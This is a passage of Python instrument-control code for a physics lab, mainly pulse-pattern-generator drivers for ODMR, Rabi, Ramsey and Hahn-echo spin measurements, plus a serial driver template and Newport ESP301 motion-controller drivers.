chan2[current_index:current_index+length] = 1
elif seg_type_2 == 'data':
chan2[current_index:current_index+length] = self.segment_data[(2, seg)]
current_index += length
#chan1 = np.zeros()
#chan2 = np
def square(t_val, tmax):
"""
Square wave helper function for plotting trigger output
"""
if t_val < tmax/2.0:
return 1
else:
return 0
vectorized_square = np.vectorize(square) #vectorize because :gottagofast:
plt.figure(1)
plt.subplot(311)
plt.ylabel('$T_0$')
axes = plt.gca()
axes.step(t, vectorized_square(t, t.max()), 'k-', where='mid')
axes.set_ylim([-0.5,1.5])
# now plot series from channel 1
plt.subplot(312)
plt.ylabel('Channel 1')
axes = plt.gca()
axes.step(t, chan1, 'r--', where='mid')
axes.set_ylim([-0.5,1.5])
# plot series from channel 2
plt.subplot(313)
plt.ylabel('Channel 2')
axes = plt.gca()
axes.step(t, chan2, 'r--', where='mid')
axes.set_ylim([-0.5,1.5])
#plt.show()
@Action()
def odmr_waveform(self, preview_wfm=False, ref_freq=503.0):
ref_freq = 503.0
print('Setting up ODMR waveforms')
print('Identification: {}'.format(self.idn))
self.reset() #initializes default parameters for clean setup
self.display = 'off'
print('Display off?: {}'.format(self.display))
self.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(self.pattern_mode))
self.arm_source = 'immediate' # sets continuous operation
print('Arm source immediate?: {}'.format(self.arm_source))
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
self.volt_low[1] = 0.0
self.volt_high[1] = 2.5
print('High voltage, should be 2.5 V:{}'.format(self.volt_high[1]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[1]))
self.volt_low[2] = 0.0
self.volt_high[2] = 1.0
print('High voltage, should be 1.0 V:{}'.format(self.volt_high[2]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[2]))
self.data_format[1] = 'nrz'
self.data_format[2] = 'nrz'
#ref_freq = 503.0 #Hz
# since we have two pieces to the square wave, the frequency generator should
# be set to use at least twice the references.
self.frequency = 2*ref_freq
self.dig_patt_length[1] = 4
self.dig_patt_type[(2,1)] = 'high'
self.dig_patt_type[(1,1)] = 'data'
self.write('DIG:PATT:SEGM1:PRES1 2, 2')
#self.segment_data[2,1] = [np.ones(4)]
print('Internal PLL frequency:{}'.format(self.frequency))
#print(self.segment_data[1,1])
#print(self.segment_data[2,1])
#self.output_on[1] = 'on'
#self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
self.output_on[1] = 'on'
self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
print(self.output_on[2])
print(self.output_on[2])
#self.dig_patt_length[2] = scale_factor
# ignore last two segments
#self.dig_patt_length[3] = 0
#self.dig_patt_length[4] = 0
#for i in range(1,5):
# print('Segment {} length: {}'.format(i, self.dig_patt_length[i]))
#if preview_wfm:
# self.preview_wfm()
# configure two segements, one where channel 1 is high + one where channel 1 is low
#self.dig_patt_type[(1, 1)] = 'high'
#print('Channel {}, segment {} type:{}'.format(1, 1, self.dig_patt_type[(1, 1)]))
#self.dig_patt_type[(1, 2)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 2, self.dig_patt_type[(1, 2)]))
# external sync goes to TTL ref in on back of lockin
print('TODO: check that the output on the scope of this is actually reasonable')
def outputs_high(self, preview_wfm=False, ref_freq=503.0):
ref_freq = 10e6
print('PPG all outputs high!')
print('Identification: {}'.format(self.idn))
self.reset() #initializes default parameters for clean setup
self.display = 'off'
print('Display off?: {}'.format(self.display))
self.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(self.pattern_mode))
self.arm_source = 'immediate' # sets continuous operation
print('Arm source immediate?: {}'.format(self.arm_source))
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
self.volt_low[1] = 0.0
self.volt_high[1] = 2.5
print('High voltage, should be 2.5 V:{}'.format(self.volt_high[1]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[1]))
self.volt_low[2] = 0.0
self.volt_high[2] = 1.0
print('High voltage, should be 1.0 V:{}'.format(self.volt_high[2]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[2]))
self.data_format[1] = 'nrz'
self.data_format[2] = 'nrz'
#ref_freq = 503.0 #Hz
# since we have two pieces to the square wave, the frequency generator should
# be set to use at least twice the references.
self.frequency = 2*ref_freq
self.dig_patt_length[1] = 4
self.dig_patt_type[(2,1)] = 'high'
self.dig_patt_type[(1,1)] = 'high'
#self.segment_data[2,1] = [np.ones(4)]
print('Internal PLL frequency:{}'.format(self.frequency))
#print(self.segment_data[1,1])
#print(self.segment_data[2,1])
#self.output_on[1] = 'on'
#self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
self.output_on[1] = 'on'
self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
print(self.output_on[2])
print(self.output_on[2])
def rabi_waveform_step(inst, step_number):
# helper function to program the second segment of PPG waveforms to perform Rabi
#print('not implemented yet!')
#inst.output_on[1] = 'off'
#inst.output_on[2] = 'off'
#inst.comp_output_on[1] = 'off'
print(step_number)
T_init = 13200
T_rabi_max = 224
T_readout = 13200
off_len = T_rabi_max/2 - step_number
on_len = 2*step_number
data = [np.hstack((np.zeros(off_len, dtype='int'), np.ones(on_len, dtype='int'), np.zeros(off_len, dtype='int')))]
print(data)
#readout = [np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
#inst.segment_data[(1,2)] = data
encoded = inst.encode_data(data[0])
seg_num = 2
channel = 1
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
print('Channel {}, segment {} data:'.format(1, 2, inst.segment_data[(1,2)]))
#inst.output_on[2] = 'on'
return -1
def rabi_waveform_setup(inst, rabi_params):
# unpack measurement paramters
#T_init = rabi_params['T_init']
#T_readout = rabi_params['T_readout']
print('Running Rabi waveform')
print('Identification: {}'.format(inst.idn))
inst.reset() #initializes default parameters for clean setup
inst.display = 'off'
print('Display off?: {}'.format(inst.display))
inst.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(inst.pattern_mode))
#inst.arm_source = 'immediate' # sets continuous operation
#print('Arm source immediate?: {}'.format(inst.arm_source))
inst.frequency = 660e6/20.0
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
inst.volt_low[1] = 0.0
inst.volt_high[1] = 2.5
print('MW TTL high voltage, should be 2.5 V:{}'.format(inst.volt_high[1]))
print('MW TTL low voltage, should be 0 V:{}'.format(inst.volt_low[1]))
inst.data_format[1] = 'nrz'
inst.output_on[1] = 'on'
inst.comp_output_on[1] = 'on' #for scope viewing
# set up laser channel
inst.volt_low[2] = 0.0
inst.volt_high[2] = 1.0
print('AOM high voltage, should be 1.0 V:{}'.format(inst.volt_high[2]))
print('AOM Low voltage, should be 0 V:{}'.format(inst.volt_low[2]))
inst.data_format[2] = 'nrz'
inst.output_on[2] = 'on'
print('Trigger type:{}'.format(inst.trig_output))
#inst.timed_delay[1] = 100e-9 #ns
#inst.timed_delay[2] = 250e-9 #ns
print('Channel 1 timed_delay:{}'.format(inst.timed_delay[1]))
print('Channel 2 timed_delay:{}'.format(inst.timed_delay[2]))
# set up 3 different segments
# start at segment 1 and loop through all 3 segments
T_init = 13200
T_rabi_max = 224
T_readout = 13200
# Segment 1 - laser initializes spin for T_init
inst.dig_patt_length[1] = T_init
#print('Segment {} length:{}'.format(1, inst.dig_patt_length[1]))
# Segment 1 - RF off
inst.dig_patt_type[(1, 1)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 1, inst.dig_patt_type[(1, 1)]))
# Segment 1 - laser on, initializing spin
inst.dig_patt_type[(2, 1)] = 'high'
#print('Channel {}, segment {} type:{}'.format(2, 1, inst.dig_patt_type[(2, 1)]))
# Segment 2 - apply variable length RF pulse
# 2 rf is on for variable time tau_rf
inst.dig_patt_length[2] = T_rabi_max
#print('Segment {} length:{}'.format(2, inst.dig_patt_length[2]))
inst.dig_patt_type[(1,2)] = 'data'
#print('Channel {}, segment {} type:{}'.format(1, 2, inst.dig_patt_type[(1, 2)]))
# Set up segment 2 RF - initial point is with no RF on
inst.segment_data[(1,2)] = [np.zeros(T_rabi_max, dtype='int')]
#print('Channel {}, segment {} data:'.format(1, 2, inst.segment_data[(1,2)]))
# Segment 2 - laser is off
inst.dig_patt_type[(2, 2)] = 'low'
#print('Channel {}, segment {} type:{}'.format(2, 2, inst.dig_patt_type[(2, 2)]))
# Segment 3 - laser reads out, initializes, waits, reads out
inst.dig_patt_length[3] = T_rabi_max + T_init + 2 * T_readout
#print('Segment {} length:{}'.format(3, inst.dig_patt_length[3]))
# Segment 3 - RF is always off
inst.dig_patt_type[(1, 3)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 3, inst.dig_patt_type[(1, 3)]))
# Segment 3 - laser initializes, waits, reads out
inst.dig_patt_type[(2, 3)] = 'data'
#print('Channel {}, segment {} type:{}'.format(2, 3, inst.dig_patt_type[(2, 3)]))
readout1 = [np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int')))]
print(inst.dig_patt_length)
#print(readout[0].shape)
inst.segment_data[(2,3)] = readout1 #[np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
# Segment 3 - RF is always off
inst.dig_patt_type[(1, 3)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 3, inst.dig_patt_type[(1, 3)]))
# Segment 3 - laser initializes, waits, reads out
inst.dig_patt_type[(2, 3)] = 'data'
#print('Channel {}, segment {} type:{}'.format(2, 3, inst.dig_patt_type[(2, 3)]))
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'data'
readout2 = [np.hstack((np.ones(T_readout, dtype='int')))]
print(inst.dig_patt_length)
#print(readout[0].shape)
inst.segment_data[(2,4)] = readout2 #[np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
# sets PPG to loop through segments 1-3 repeatedly
inst.loop_start = 1
inst.loop_length = 3
print('Trigger source?: {}'.format(inst.trigger_source))
inst.trigger_source = 'internal'
print('Trigger source?: {}'.format(inst.trigger_source))
print('trigger mode:{}'.format(inst.trig_mode))
print(inst.trig_output)
print('trigger position:{}'.format(inst.trig_pos))
#from time import sleep
#sleep(10)
#inst.write('ARM:SOUR MAN')
#inst.write('ARM:MODE STAR')
#inst.write('DIG:PATT:LOOP:INF ON')
#inst.write('DIG:PATT:INST:STAR SEGM1')
#inst.write('DIG:PATT:LOOP:LENG 3')
#inst.preview_wfm()
#
# data = np.random.randint(2, size=100, dtype=np.uint8)
# encoded = inst.encode_data(data)
#
# print('Data:{}'.format(data))
# print('Encoded:{}'.format(encoded))
#
# decoded = inst.decode_data('{}'.format(encoded))
# print('Decoded:{}'.format(decoded))
# for segment in segments:
#
# segment_length = inst.dig_patt_length[segment]
#
# for channel in [1,2]:
#
# v_high = inst.volt_high[channel]
# v_low = inst.volt_low[channel]
#
# segment_type = inst.dig_patt_type[(channel, segment)]
#
# if segment_data == 'data':
# pass
# #data = inst.segment_data[(channel, segment)]
#
#
# #print(segment)
# #print(inst.segment_data[(channel, segment)])
#
# #print(data)
# plt.plot(data)
# plt.xlabel('Time')
# plt.ylabel('Voltage')
# plt.show()
# figure out these numbers!
T_init = 1000 #us
T_gap = 50 #us
T_readout = 1000 #us
tau_rf = 100*1e-3 #100 ns
# program pattern of RF on for tau after T_init + T_gap / 2 - tau_rf
# figure out how to vary tau_rf + have it still placed appropriately
def pulse_odmr_setup(inst):
"""
Sets up PPG output channels for pulsed ODMR measurements.
"""
print('Identification: {}'.format(inst.idn))
inst.reset() #initializes default parameters for clean setup
inst.display = 'off'
print('Display off?: {}'.format(inst.display))
inst.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(inst.pattern_mode))
#inst.arm_source = 'immediate' # sets continuous operation
#print('Arm source immediate?: {}'.format(inst.arm_source))
inst.frequency = 660e6
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
inst.volt_low[1] = 0.0
inst.volt_high[1] = 2.5
print('MW TTL high voltage, should be 2.5 V:{}'.format(inst.volt_high[1]))
print('MW TTL low voltage, should be 0 V:{}'.format(inst.volt_low[1]))
inst.data_format[1] = 'nrz'
inst.output_on[1] = 'on'
inst.comp_output_on[1] = 'on' #for scope viewing
# set up laser channel
inst.volt_low[2] = 0.0
inst.volt_high[2] = 1.0
print('AOM high voltage, should be 1.0 V:{}'.format(inst.volt_high[2]))
print('AOM Low voltage, should be 0 V:{}'.format(inst.volt_low[2]))
inst.data_format[2] = 'nrz'
inst.output_on[2] = 'on'
inst.comp_output_on[2] = 'on' #for scope viewing
print('Trigger type:{}'.format(inst.trig_output))
#inst.timed_delay[1] = 100e-9 #ns
#inst.timed_delay[2] = 250e-9 #ns
print('Channel 1 timed_delay:{}'.format(inst.timed_delay[1]))
print('Channel 2 timed_delay:{}'.format(inst.timed_delay[2]))
def rabi_step(inst, step_number):
"""
Sets up next waveform point for Rabi
"""
T_rabi_max = 4096
data = [np.hstack((np.ones(step_number, dtype='int'), np.zeros(T_rabi_max - step_number, dtype='int')))]
encoded = inst.encode_data(data[0])
seg_num = 3
channel = 1
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
def ramsey_setup(inst, ramsey_params, pi_pulse_len):
T_ramsey_max = 6144
T_init = 336*5 #~2.5us
T_gap = 16*15 # segment 2, everything off
T_readout = 336*5 #~2.5us
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pad = np.zeros(T_ramsey_max - pi_pulse_len, dtype='int')
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_ramsey_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is pi pulse w/o separation
inst.segment_data[(1,3)] = [np.hstack((pi_pulse, pad))]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
def ramsey_step(inst, ramsey_params, pi_pulse_len, tau):
T_ramsey_max = 6144
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
delay = np.zeros(tau, dtype='int')
pad = np.zeros((T_ramsey_max - (tau + pi_pulse_len)), dtype='int')
data = np.hstack((pi2_pulse, delay, pi2_pulse, pad))
seg_num = 3
channel = 1
encoded = inst.encode_data(data)
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
def hahn_setup(inst, hahn_params):
freq = hahn_params['ppg_freq']
inst.frequency = freq
conversion = freq / 660e6
T_hahn_max = hahn_params['T_hahn_max']
T_init = int(hahn_params['T_init'] * conversion)
T_gap = int(hahn_params['T_gap'] * conversion)
T_readout = int(hahn_params['T_readout'] * conversion)
tau_min = int(hahn_params['tau_min'] * conversion)
pi_pulse_len = 2
pad = np.zeros(int((T_hahn_max - 2*pi_pulse_len - tau_min)/2.0), dtype='int')
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
tau2 = np.zeros(int(tau_min/2), dtype='int')
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, pi/2, tau, pi, -pi/2 pulses
inst.dig_patt_length[3] = T_hahn_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
hahn_data = np.hstack((pad, pi2_pulse, tau2, pi_pulse, tau2,
pi2_pulse, pad))
print(T_hahn_max)
print(hahn_data.shape)
inst.segment_data[(1,3)] = [hahn_data]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
def hahn_step(inst, hahn_params, tau):
T_hahn_max = hahn_params['T_hahn_max']
pi_pulse_len = hahn_params['pi_pulse_len']
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
tau2 = np.zeros(int(tau/2), dtype='int')
pad = np.zeros(int((T_hahn_max - 2*pi_pulse_len - tau)/2.0), dtype='int')
hahn_data = np.hstack((pad, pi2_pulse, tau2, pi_pulse, tau2, pi2_pulse, pad))
print(hahn_data.shape)
seg_num = 3
channel = 1
encoded = inst.encode_data(hahn_data)
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
inst.segment_data[(channel, seg_num)]
return
def rabi_setup(inst):
"""
Sets up pulse sequence for doing Rabi
"""
T_init = 336*6 #500 ns
T_gap = 16*15 # segment 2, everything off
T_rabi_max = 4096
T_readout = 336*6 # 500 ns
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_rabi_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is with no RF on
inst.segment_data[(1,3)] = [np.zeros(T_rabi_max, dtype='int')]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
print('Trigger source?: {}'.format(inst.trigger_source))
inst.trigger_source = 'internal'
print('Trigger source?: {}'.format(inst.trigger_source))
print('trigger mode:{}'.format(inst.trig_mode))
print(inst.trig_output)
print('trigger position:{}'.format(inst.trig_pos))
def calibrate_pi_setup(inst, downconversion_rate):
inst.frequency = 660e6 / downconversion_rate
print(inst.frequency)
T_init = int(336*6 / downconversion_rate) #500 ns
T_gap = int(16*15 / downconversion_rate) # segment 2, everything off
T_rabi_max = int(4096 / downconversion_rate)
T_readout = int(336*6 / downconversion_rate) # 500 ns
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_rabi_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is with no RF on
num_pulses = 5
data = np.hstack((np.ones(2*num_pulses, dtype='int'), np.zeros(T_rabi_max - 2*num_pulses, dtype='int')))
inst.segment_data[(1,3)] = [data]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
inst.trigger_source = 'internal'
return
if __name__ == '__main__':
test_wfm = True
test_rabi = False
test_comm = False
gpib_addr = 10
with Ag81130A('GPIB0::{}::INSTR'.format(gpib_addr)) as inst:
#inst.preview_wfm()
if test_wfm:
inst.odmr_waveform()
elif test_rabi:
rabi_waveform_test(inst)
elif test_comm:
print('Identification: {}'.format(inst.idn))
inst.reset()
print('Display: {}'.format(inst.display))
inst.display = 'off'
print('Display: {}'.format(inst.display))
print('Digital pattern mode: {}'.format(inst.pattern_mode))
inst.pattern_mode = 'on'
print('Digital pattern mode: {}'.format(inst.pattern_mode))
print('Arm source: {}'.format(inst.arm_source))
inst.arm_source = 'manual'
print('Arm source: {}'.format(inst.arm_source))
inst.arm_source = 'immediate'
print('Arm source: {}'.format(inst.arm_source))
for segment in range(1,5):
print('Segment {} length:{}'.format(segment, inst.dig_patt_length[segment]))
inst.dig_patt_length[segment] = 100
print('Segment {} length:{}'.format(segment, inst.dig_patt_length[segment]))
for channel in [1,2]:
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
inst.volt_high[channel] = 3.0
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
inst.volt_high[channel] = 2.5
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
inst.volt_low[channel] = -1.0
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
inst.volt_low[channel] = 0.0
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
for segment in range(1,5):
inst.dig_patt_type[(channel, segment)] = 'high'
print('Channel {}, segment {} type:{}'.format(channel, segment, inst.dig_patt_type[(channel, segment)]))
print('Channel format:{}'.format(inst.data_format[channel]))
inst.data_format[channel] = 'nrz'
print('Channel format:{}'.format(inst.data_format[channel]))
print('Channel output:{}'.format(inst.output_on[channel]))
inst.output_on[channel] = 'on'
print('Channel output:{}'.format(inst.output_on[channel]))
```
#### File: drivers/examples/serial_example.py
```python
from lantz import Action, Feat, DictFeat
from lantz import MessageBasedDriver
class SerialTemplate(MessageBasedDriver):
"""Template for drivers connecting via serial port.
"""
DEFAULTS = {'ASRL': {'write_termination': '\n',
'read_termination': '\n'}}
@Feat()
def a_read_only_property(self):
"""Help for a a_read_only_property
"""
return self.query('*IDN?')
@Feat(units='V', limits=(10,))
def a_read_write_property(self):
"""Help for a_read_write_property
"""
return float(self.query('?AMP'))
@a_read_write_property.setter
def a_read_write_property(self, value):
self.query('!AMP {:.1f}'.format(value))
@DictFeat(values={True: '1', False: '0'}, keys=list(range(1,9)))
def a_read_write_dictionary_property(self, key):
"""Help for a_read_write_dictionary_property
"""
return self.query('?DOU {}'.format(key))
@a_read_write_dictionary_property.setter
def a_read_write_dictionary_property(self, key, value):
self.query('!DOU {} {}'.format(key, value))
@Action()
def do_something(self):
"""Help for do_something
"""
return
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test Kentech HRI')
parser.add_argument('-i', '--interactive', action='store_true',
default=False, help='Show interactive GUI')
parser.add_argument('-p', '--port', type=str, default='17',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with SerialTemplate(args.port) as inst:
if args.interactive:
from lantz.ui.app import start_test_app
start_test_app(inst)
else:
# Add your test code here
print('Non interactive mode')
```
#### File: drivers/motion/motioncontroller.py
```python
import time
import numpy as np
from lantz.feat import Feat
from lantz.action import Action
from lantz.driver import Driver
from pyvisa import constants
from lantz import Q_, ureg
from lantz.processors import convert_to
from .axis import MotionAxisSingle, MotionAxisMultiple
# Add generic units:
# ureg.define('unit = unit')
# ureg.define('encodercount = count')
# ureg.define('motorstep = step')
class MotionControllerMultiAxis(Driver):
""" Motion controller that can detect multiple axis
"""
def initialize(self):
super().initialize()
@Feat()
def idn(self):
raise AttributeError('Not implemented')
@Action()
def detect_axis(self):
""" Find the number of axis available.
The detection stops as soon as an empty controller is found.
"""
pass
@Action()
def get_errors(self):
raise AttributeError('Not implemented')
@Feat(read_once=False)
def position(self):
return [axis.position for axis in self.axes]
@Feat(read_once=False)
def _position_cached(self):
return [axis.recall('position') for axis in self.axes]
@position.setter
def position(self, pos):
"""Move to position (x,y,...)"""
return self._position(pos)
@Action()
def _position(self, pos, read_pos=None, wait_until_done=True):
"""Move to position (x,y,...)"""
if read_pos is not None:
self.log_error('kwargs read_pos for function _position is deprecated')
for p, axis in zip(pos, self.axes):
if p is not None:
axis._set_position(p, wait=False)
if wait_until_done:
for p, axis in zip(pos, self.axes):
if p is not None:
axis._wait_until_done()
axis.check_position(p)
return self.position
return pos
@Action()
def motion_done(self):
for axis in self.axes:
axis._wait_until_done()
def finalize(self):
for axis in self.axes:
if axis is not None:
del (axis)
super().finalize()
class MotionControllerSingleAxis(MotionAxisSingle):
""" Motion controller that can only has sinlge axis
"""
def initialize(self):
super().initialize()
```
#### File: drivers/newport_motion/motionesp301.py
```python
from lantz.feat import Feat
from lantz.action import Action
#from lantz.serial import SerialDriver
from lantz.messagebased import MessageBasedDriver
from pyvisa import constants
#from lantz.visa import GPIBVisaDriver
from lantz import Q_, ureg
from lantz.processors import convert_to
import time
import numpy as np
import copy
# Add generic units:
#ureg.define('unit = unit')
#ureg.define('encodercount = count')
#ureg.define('motorstep = step')
class ESP301(MessageBasedDriver):
""" Newport ESP301 motion controller. It assumes all axes to have units mm
:param scan_axes: Should one detect and add axes to the controller
"""
DEFAULTS = {
'COMMON': {'write_termination': '\r\n',
'read_termination': '\r\n',},
'ASRL':{
'timeout': 4000, #ms
'encoding': 'ascii',
'data_bits': 8,
'baud_rate': 19200,
'parity': constants.Parity.none,
'stop_bits': constants.StopBits.one,
'flow_control': constants.VI_ASRL_FLOW_RTS_CTS,#constants.VI_ASRL_FLOW_NONE,
},
}
def initialize(self):
super().initialize()
self.detect_axis()
@classmethod
def via_usb(cls, port, name=None, **kwargs):
"""Connect to the ESP301 via USB. Internally this goes via serial"""
cls.DEFAULTS = copy.deepcopy(cls.DEFAULTS)
cls.DEFAULTS['ASRL'].update({'baud_rate': 921600})
return cls.via_serial(port=port, name=name, **kwargs)
@Action()
def detect_axis(self):
""" Find the number of axis available.
The detection stops as soon as an empty controller is found.
"""
self.axes = []
i = 0
scan_axes = True
while scan_axes:
try:
i += 1
id = self.query('%dID?' % i)
axis = ESP301Axis(self, i, id)
self.axes.append(axis)
except:
err = self.get_errors()
if err == 37: # Axis number missing
self.axes.append(None)
elif err == 9: # Axis number out of range
scan_axes = False
elif err == 6: # Axis number out of range, but wrong errorcode
scan_axes = False
else: # Dunno...
raise Exception(err)
@Action()
def get_errors(self):
err = int(self.query('TE?'))
return err
@Feat(read_once=False)
def position(self):
return [axis.position for axis in self.axes]
@Feat(read_once=False)
def _position_cached(self):
return [axis._position_cached for axis in self.axes]
@position.setter
def position(self, pos):
"""Move to position (x,y,...)"""
return self._position(pos)
@Action()
def _position(self, pos, read_pos=None, wait_until_done=True):
"""Move to position (x,y,...)"""
if read_pos is not None:
self.log_error('kwargs read_pos for function _position is deprecated')
for p, axis in zip(pos, self.axes):
if not p is None:
axis._set_position(p, wait=False)
if wait_until_done:
for p, axis in zip(pos, self.axes):
if not p is None:
axis._wait_until_done()
axis.check_position(p)
return self.position
return pos
@Action()
def motion_done(self):
for axis in self.axes: axis._wait_until_done()
def finalize(self):
for axis in self.axes:
if axis is not None:
del (axis)
super().finalize()
#class ESP301GPIB( ESP301, GPIBVisaDriver):
# """ Untested!
# """
# def __init__(self, scan_axes=True, resource_name= 'GPIB0::2::INSTR', *args, **kwargs):
# # Read number of axes and add axis objects
# self.scan_axes = scan_axes
# super().__init__(resource_name=resource_name, *args, **kwargs)
class ESP301Axis(ESP301):
def __init__(self, parent, num, id, *args, **kwargs):
#super(ESP301Axis, self).__init__(*args, **kwargs)
self.parent = parent
self.num = num
self.id = id
self.wait_time = 0.01 # in seconds * Q_(1, 's')
self.backlash = 0
self.wait_until_done = True
self.accuracy = 0.001 # in units reported by axis
# Fill position cache:
self.position
def __del__(self):
self.parent = None
self.num = None
def id(self):
return self.id
@Action()
def on(self):
"""Put axis on"""
self.parent.write('%dMO' % self.num)
@Action()
def off(self):
"""Put axis on"""
self.parent.write('%dMF' % self.num)
@Feat(values={True: '1', False: '0'})
def is_on(self):
"""
:return: True is axis on, else false
"""
return self.parent.query('%dMO?' % self.num)
@Action(units='mm')
def define_home(self, val=0):
"""Remap current position to home (0), or to new position
:param val: new position"""
self.parent.write('%dDH%f' % (self.num, val))
@Feat(units='mm', read_once=False)
def _position_cached(self):
return self.__position_cached
@_position_cached.setter
def _position_cached(self, pos):
self.__position_cached = pos
@Feat(units='mm')
def position(self):
self._position_cached = float(self.parent.query('%dTP?' % self.num))*ureg.mm
return self._position_cached
@position.setter
def position(self, pos):
"""
Waits until movement is done if self.wait_until_done = True.
:param pos: new position
"""
if not self.is_on:
self.log_error('Axis not enabled. Not moving!')
return
# First do move to extra position if necessary
self._set_position(pos, wait=self.wait_until_done)
@Action(units=['mm',None])
def _set_position(self, pos, wait=None):
"""
Move to an absolute position, taking into account backlash.
When self.backlash is to a negative value the stage will always move
from low to high values. If necessary, a extra step with length
self.backlash is set.
:param pos: New position in mm
:param wait: wait until stage is finished
"""
# First do move to extra position if necessary
if self.backlash:
position = self.position.magnitude
#backlash = self.backlash.to('mm').magnitude
backlash = convert_to('mm', on_dimensionless='ignore')(self.backlash).magnitude
if ( backlash < 0 and position > pos) or\
( backlash > 0 and position < pos):
self.log_info('Using backlash')
self.__set_position(pos + backlash)
self._wait_until_done()
# Than move to final position
self.__set_position(pos)
if wait:
self._wait_until_done()
